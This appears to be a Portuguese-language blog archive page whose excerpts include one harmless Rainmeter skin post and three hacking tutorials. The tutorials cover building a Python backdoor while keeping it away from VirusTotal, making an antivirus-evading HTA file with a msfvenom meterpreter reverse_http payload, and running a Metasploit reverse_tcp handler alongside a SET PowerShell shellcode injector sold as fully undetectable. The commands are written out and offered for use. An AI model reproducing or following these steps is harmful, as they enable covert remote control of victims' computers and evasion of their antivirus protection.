Pular para o conteúdo principal

Postagens

Mostrando postagens de junho, 2016

PC Greek - Rainmeter - Skin BlueVision V0.2

Download  do Programa Rainmeter: https://www.rainmeter.net/ Download do Skin BlueVision V0.2 Alpha: http://g3xter.deviantart.com/art/BlueVision-V0-2-Alpha-RAINMETER-162478234 Direct: http://adf.ly/4663768/bluevision Download Skin Mass Effect Rainmeter: http://rickf7666.deviantart.com/art/Mass-Effect-Rainmeter-Skin-270458946 Outros: http://rickf7666.deviantart.com/art/Mass-Effect-Colonist-Rainmeter-Skin-272451667 http://rickf7666.deviantart.com/art/Mass-Effect-2-Rainmeter-Theme-262513283 Video:

simple Backdoor Python privilege Escalation add User Hide add DLL simultaneous Remote Desktop

1 - Verifique seu ip, você pode usar esse script em python: https://github.com/msOlivers/PacketofScripts/tree/master/myIpPython ou em http://whatismyipaddress.com/ 2 - Baixe o Simples Backdoor em: https://github.com/msOlivers/PacketofScripts/tree/master/simpleBackdoorPython   Edite as linhas HOST com seu IP e a PORT com  uma de sua preferencia ATENÇÃO: Use judiciously Do NOT upload VirusTotal or similiar websites Do NOT upload public websites Do NOT send the file via e-mail Not following the above rules may result  in: Your tests might be compromised -------------------------------------------------------- Use criteriosamente NÃO faça upload do arquivo para VirusTotal ou sites parecidos NÃO carregue o arquivo para sites públicos NÃO enviar o arquivo via e-mail Não seguir as regras acima pode resultar em: Seus testes pode ser comprometido 3 - Compile para exe usando py2exe, Como instalar o python e py2exe: https://www.youtube.com/watch?v=qDYkx...

[100% clean] Bypass Av's - Reverse tcp - Shellcode Execution Via HTA

1 - Salve o codigo ( Reve_HTTP_Excel.hta ) do github em:  https://gist.github.com/subTee/e126c6ee847a4d9fcfd7 com o nome RevTcp.hta shellcode Execution Via HTA  Autor: Smith @subTee 2 -  Acesse sua are de trabalho e crie um pasta, comando: mkdir novaPasta && cd novaPasta 3  - Gere uma ShellCode, Comando: msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.56.103 LPORT=8080 --format vba > msf.txt 4 - Abra o codigo msf.txt com o gedit ou leafpad e remova as linhas Remova a linha de 1 ate 10 e salve o arquivo 5 - Vamos adicionar algums codigo com o sed, Comando: sed "s/^/strCode += '/" msf.txt > novoMsf.txt  sed "s/$\\\\n'/" novoMsf.txt > novoMsf_3.txt 6 - Abra o codigo  novoMsf_3.txt com o gedit o leafpad e copie o codigo todo 7 - Abra o codigo RevTcp.hta e remova as linha Remova a linhas de 33 ate 70 8 - Na linha 33 que esta em branco cole o codigo copiado de novoMsf_3.txt e faça uma tabulação n...

[FUD 100%] bypassAV - Setoolkit Powershell Alphanumeric Shellcode Injector

1 - Inicie noip, se nao sabe intalar no seu kali assista esse vide: https://www.youtube.com/watch?v=epFINp0r77c 2 - Inicie Postgresql 3 - Check seu Ip em: http://whatismyipaddress.com/ 4 - Inicie Msfconsole com suas configuraçoes: Ex: msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT 7000;set LHOST 192.168.1.3;set ExitOnSession false; exploit -j" -q 5 - Inicie o Setoolkit set opção 1 - Social-Engineering Attacks set opção 9 - Powershell Attack Vectors set opção 1 - Powershell Alphanumeric Shellcode Injector   set seu IP set sua Porta   set opção no - [yes/no] 6 - Entre na pasta /root/.set/reports/powershell 7 - Mova x86_powershell_injection.txt para area de trabalho 8 - Faça Upload de  x86_powershell_injection.txt para um servidor remoto ou web 9 - Copie o codigo(Executable_C_Code) do github para seu computador code: https://github.com/msOlivers/PacketofScripts/tree/master/ExecutableCCode - edit a sua url ...